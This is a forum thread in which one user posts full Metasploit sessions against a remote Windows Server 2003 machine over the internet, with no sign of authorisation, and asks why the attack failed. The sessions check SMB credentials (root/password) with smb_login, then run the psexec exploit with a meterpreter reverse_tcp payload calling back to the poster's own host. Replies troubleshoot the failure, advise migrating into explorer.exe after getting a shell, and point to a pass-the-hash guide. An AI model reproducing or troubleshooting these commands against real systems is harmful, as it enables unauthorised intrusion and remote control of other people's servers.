mbarakoda
Posted October 10, 2012

Target OS: Windows 2003 SP2 EN
Target public IP: XX.XX.XX.XX
Target open port: 445
My OS: Windows 7
My public IP: YY.YY.YY.YY
My local IP: 192.168.2.42
My router: SMC

Due to the fact that the target is not on the same LAN, and the attack will be over the internet, I started by setting up a port forward in the router settings as follows:

Name: AUTH - Protocol: TCP/UDP - WAN Port: 4444 - Server Host Port: 4444 - Server IP Address: 192.168.2.42

I installed Metasploit and started by checking whether the credentials are valid or not by running scanner/smb/smb_login as follows:

    msf> use scanner/smb/smb_login
    msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
    rhosts => XX.XX.XX.XX
    msf auxiliary(smb_login) > set smbuser root
    smbuser => root
    msf auxiliary(smb_login) > set smbpass password
    smbpass => password
    msf auxiliary(smb_login) > run
    [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
    [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
    [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
    [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
    [*] Auth-User: "root"
    [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Then, after the login was successful, I tried to use exploit/windows/smb/psexec to exploit the server as follows:

    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set rhost XX.XX.XX.XX
    rhost => XX.XX.XX.XX
    msf exploit(psexec) > set smbuser root
    smbuser => root
    msf exploit(psexec) > set smbpass password
    smbpass => password
    msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(psexec) > set lhost YY.YY.YY.YY
    lhost => YY.YY.YY.YY
    msf exploit(psexec) > set lport 4444
    lport => 4444
    msf exploit(psexec) > exploit
    [-] Handler failed to bind to YY.YY.YY.YY:4444
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Connecting to the server...
    [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
    [*] Uploading payload...
    [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

But as you see, the exploit failed although the credentials are valid and confirmed above. Can you help me understand what's wrong with the above?

Infiltrator
Posted October 12, 2012

It could be that the vulnerability is already patched.

digip
Posted October 12, 2012

    [-] Handler failed to bind to YY.YY.YY.YY:4444

What's running locally already on 4444? Also, what OS is the target? Windows, or Linux running SMB? User root on a Windows box seems unlikely, whereas I could see it on a Linux machine running Samba, which, if you think about it, I don't think psexec works on Linux as a payload, but I could be wrong.

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

Infiltrator
Posted October 16, 2012

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash